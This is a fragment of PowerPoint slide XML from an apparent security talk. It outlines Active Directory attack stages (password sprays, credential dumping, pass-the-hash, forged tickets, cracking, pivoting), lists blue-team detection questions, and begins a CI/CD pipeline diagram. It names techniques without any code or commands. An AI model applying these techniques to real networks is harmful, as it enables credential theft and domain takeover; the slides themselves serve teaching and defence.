          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254381" y="3677383"/>
            <a:ext cx="5639822" cy="2042111"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha val="0"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="34925">
            <a:solidFill>
              <a:srgbClr val="4EE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DB95D20D-95DC-F34C-A09F-5D5D774A1056}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371680" y="3767673"/>
            <a:ext cx="3308092" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Password Sprays</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A55BAAFC-B427-A24C-AB22-8F323DC008F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30038" y="4151291"/>
            <a:ext cx="1261635" cy="1261635"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4F73E55-151E-CF4D-91FA-F2F73CCEBB9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973806" y="4044351"/>
            <a:ext cx="1674427" cy="1674427"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Rounded Rectangle 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7BC2192-F4A4-6D48-B244-E6D7066B9A6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3842571" y="4353866"/>
            <a:ext cx="1745889" cy="8178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Win Servers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Rectangle 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70E9519E-A584-ED40-8DDB-AED2BC00A1B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6090879" y="3683538"/>
            <a:ext cx="5639822" cy="2042111"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha val="0"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="34925">
            <a:solidFill>
              <a:srgbClr val="EF40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15F1B6B5-0DFC-BE4A-A4B5-5740DFFF41AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7082481" y="3805996"/>
            <a:ext cx="3308092" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Domain Compromise</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Rounded Rectangle 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{678B1F2B-CABD-1142-A5CA-447CA239833B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6718035" y="4238923"/>
            <a:ext cx="1330719" cy="639560"/>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Priv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> creds cached</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Rounded Rectangle 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1F214DE-F1C5-6547-A168-DF7DD954888D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8245430" y="4238923"/>
            <a:ext cx="1330719" cy="639560"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">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Dump,pth,ptt,ptc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Rounded Rectangle 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08057EFB-6173-6449-B91E-352212BDCD34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9742310" y="4252292"/>
            <a:ext cx="1330719" cy="626191"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">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 forged tickets</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Rounded Rectangle 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF6A4958-33E4-A04C-9FA6-1C80076EBEBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7464309" y="5014083"/>
            <a:ext cx="1330719" cy="639560"/>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Crack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pwds</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Rounded Rectangle 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A367F0B7-0524-2247-9A76-6E886197629A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8991704" y="5006808"/>
            <a:ext cx="1330719" cy="63956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Pivot</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Picture 4" descr="Cyber Security Training | SANS Courses, Certifications &amp; Research">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC9D4C67-CFAA-6144-AD83-58139336186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D78A1068-6D67-C146-833F-3AD48755C369}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8121392" y="2556997"/>
            <a:ext cx="3432176" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MacHound</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> also available</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3047894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F5C5-E6B6-CE42-B23B-4C583363B1A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Blue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4EEBFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Team Considerations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A41050A6-CF93-734A-B8EC-C1AF3E022E28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381001" y="1682812"/>
            <a:ext cx="7935096" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Insight into when heavy AD enumeration is happening?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Visibility into port scans or sweeps? (any subnets missing visibility?)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Visibility into internal password sprays (AD, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, etc.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Proactively search internal wiki/Confluence/SharePoint for secrets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Detections for AD abuse (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dcsync</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, golden ticket, etc.) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36BF6BFD-207C-F046-A6C8-E4171964F231}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8495441" y="2551840"/>
            <a:ext cx="3489244" cy="2613283"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Cyber Security Training | SANS Courses, Certifications &amp; Research">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAFCE1C1-4FCD-9F4E-8727-30A12E2462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931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DD8B-B9D0-F64C-A266-FD538C4944A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1450392" y="304927"/>
            <a:ext cx="9291215" cy="1049235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4EEBFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CI/CD Pipeline</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50B73E63-B198-194C-8A92-9701EFD634A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18843" y="1384263"/>
            <a:ext cx="11881294" cy="4208073"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4" name="Straight Arrow Connector 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A417F7D-9697-9947-B2FC-615C6705597A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1899887" y="2901075"/>
            <a:ext cx="1015591"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147735E-4A64-3140-8D51-ADA2C4503F3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="121113" y="2095885"/>
            <a:ext cx="1688616" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Developer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="A picture containing room, drawing&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22B73416-7D52-1E43-8FA2-FEBE0E16865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48224" y="1755648"/>
            <a:ext cx="4124301" cy="2840269"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E5E6811-50B9-3C48-B816-85329D85D793}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1744020" y="2991118"/>
            <a:ext cx="1159345" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Commits Code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11" descr="A picture containing drawing&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E840BC24-D573-D749-9CB3-4E76E94C377D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3087944" y="2449027"/>
            <a:ext cx="1422400" cy="1422400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="31" name="Straight Arrow Connector 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E79B73B-481D-C74D-9350-2B839BE85C29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4649714" y="2919802"/>
            <a:ext cx="1309776" cy="5475"/>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E0DED14-5D74-D144-9773-508688209859}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4433887" y="2991117"/>
            <a:ext cx="1688616" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jenkins build</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62EFC404-A6B2-5E4A-9B45-F3CB2E7D300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37992" y="5203564"/>
            <a:ext cx="1427075" cy="1384263"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="TextBox 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E264B41-FCFC-DF40-83B0-4049BAADA2CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7079818" y="2936651"/>
            <a:ext cx="1688616" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Create &amp; push image</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="38" name="Straight Arrow Connector 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8DA944A-7C44-0B44-8597-F0D9F22DB1AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7269238" y="2901075"/>
            <a:ext cx="1309776" cy="5475"/>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30A4FDA-DF35-D249-842B-3294A7320DEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8820328" y="2517413"/>
            <a:ext cx="3264387" cy="1133945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Picture 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7073204-6BB7-9B4D-9656-8639FECFCB95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9334386" y="4904839"/>
            <a:ext cx="1651000" cy="1905000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="43" name="Straight Arrow Connector 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{926F00F0-C97E-D043-8B7D-A39FED0C2308}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6528084" y="5895025"/>
            <a:ext cx="2655673"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A67B3494-ED6E-E04B-A0F2-C53665D4AA98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7079818" y="5231591"/>
